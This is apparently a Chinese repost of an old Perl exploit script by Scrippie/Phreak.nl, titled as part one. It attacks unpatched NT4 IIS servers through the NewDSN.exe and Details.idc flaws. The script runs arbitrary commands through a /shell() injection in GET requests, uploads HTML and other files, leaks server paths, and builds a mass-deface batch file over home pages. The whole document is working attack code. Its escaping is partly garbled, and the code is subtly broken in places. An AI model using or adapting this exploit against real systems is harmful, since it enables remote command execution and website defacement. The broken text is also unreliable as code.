攻击NT4没打补丁的perl程序(上)

#!/usr/bin/perl ##################################################################### # NewDSN.exe/CTGuestB.idc/Details.idc exploit by Scrippie/Phreak.nl # ##################################################################### # Fuck JP # Version 1.3 # ################################################ # Part of this source has been ripped from RFP # # Exploit idea also by RFP ###################### # Much love to: Maja, Dopey, Hester # # # Cheers to: #phreak.nl # Maja, I love you # ################################################ # # 最新添加的功能 ################################ # - 强制命令模式 # Mail me at: [email protected] # # - 可以上载.html文件 ################################ # - 检测是否 .idc 文件漏洞已经修复 # ######################################################### # ToDo: # # <Xphere> gebruik ord() liever # # <Xphere> #weeh = ord($char); # # <Xphere> $weeh = ord($char); # # <Xphere> krijg je nummer # #################################### use Socket; use Getopt::Std; getopts("wcdh:u:fm:g:", %args); print("NewDSN exploit v 1.3 -- Scrippie / Phreak.nlnn"); if (!defined $args{h}) { print("Usage: dsnhack.pl -h <host>n"); print("t-c = create a new M$ Access DSN (Web SQL)n"); print("t-d = 通过几个程序溢出得出系统绝对路径n"); print("t-f = 强制命令执行(跳过检测.idc等文件)n"); print("t-g <server:filename> = 通过FTP上载文件到NT服务器n"); print("t-h <host> = 想扫描的主机地址n"); print("t-u <filename> = 上载HTML文件n"); print("t-w = 对Win 95的支持n"); print("t-m <dir /s /b file> = Mass deface (see documentation)n"); exit; } $host = $args{h}; $target = inet_aton($host) // die("inet_aton problems; host doesn't exist?"); if(defined $args{d}) { print("* [ Trying to get the hard path with the .idc flaw ] *nn "); $temp = &idc_bug; if($temp ne "") { print $temp; } else { print "Failed..."; } print("nn* [ Trying to get the hard path with the .ida flaw ] *nn "); $temp = &ida_bug; if($temp ne "") { print $temp; } else { print "Failed..."; } print("nn* [ Trying to get the hard path with the .pl flaw ] *nn "); $temp = &pl_bug; if($temp ne "") { print("$tempn"); } else { print "Failed...n"; } exit; } if(defined $args{g}) { &upload_file($args{g}); exit; } if(defined $args{u}) { open(HTMLFILE, "<" . $args{u}) or die "Cannot open $args{u}: $!n"; print("* Now uploading: $args{u} to C:\phreak.htm on $args{h}n "); while(<HTMLFILE>) { s/([<^>])/^$1/g; # Escape using the WinNT ^ escape char s/([x0Dx0A])//g; # Filter r, n chars s///^/chr(124)//g; # Convert / chars s/"/^/chr(34)//g; # Convert " chars s/&/^/chr(38)//g; # Convert & chars if($_ ne "") { $upcmd = "cmd /c echo " . $_ . " >> C:\phreak.htm"; &exec_cmd($upcmd); } } print("Done!n"); close(HTMLFILE); exit; } if(defined $args{m}) { &list_deface_bat($args{m}); exit; } if(defined $args{c}) { if(!defined $args{f}) { print("* [Checking for necessary files] *nn"); &check_cgis; } else { print("* Forced command mode on - Skipping checksn"); } print("n* Now trying to create "Web SQL" DSN... "); if(&make_dsn == 0) { print("<failed> *n"); exit; } else { print("<success> *n"); } print("nInitializing GuestBook by GETting ctguestb.idcn"); &init_gb; } else { if(!defined $args{f}) { print("Checking for: details.idct-- "); if(&check_details == 0) { print("Not Found :(n"); exit; } else { print("Found :)n"); } } else { print("* Forced command mode on - Skipping checksn"); } } if (defined $args{w}) { $comm="command /c"; } else { $comm="cmd /c"; } print("nType the command line you want to run ($comm assumed):n"); print("$comm "); $in=<STDIN> chomp $in; $command="$comm " . $in ; &exec_cmd($command); ###################################### # 用details.idc来执行系统命令 # ###################################### sub exec_cmd { my ($command) = @_; $command =~ s/s/+/g; # Convert spaces to plusses (%20 will also work) sendraw("GET /scripts/samples/details.idc?Fname=hi&Lname=/shell("$command")/" . " HTTP/1.0nn"); } ########################################### # 上载.bat文件 # ########################################### sub list_deface_bat { my ($dir_file) = @_; open(DIRFILE, $dir_file) or die "Cannot open $args{m}: $!n"; print("--- Go and have a beer - this will take a whilenn"); while(<DIRFILE>) { s/([x0Ax0D])//; # Yes, I dislike chop() - it doesn't cope with rn newlines # in a *nix environment if(/index.htm/ // /index.asp/ // /default.htm/ // /default.asp/ // /home.htm/ // /home.asp/ // /main.htm/ // /main.asp/ // /inhoud.htm/ // /inhoud.asp/ // /index.stm/) { print(" Adding $_ to our mass deface batch filen"); &exec_cmd("cmd /c echo copy C:\phreak.htm $_ >> c:\phjear.bat"); } } print("n* Behave and don't run C:\phjear.bat You Filthy ScR/pT K1dx0r!n"); print(" Oh, did you know this stuff is VERY easy to spot in the logs? *grin* n"); }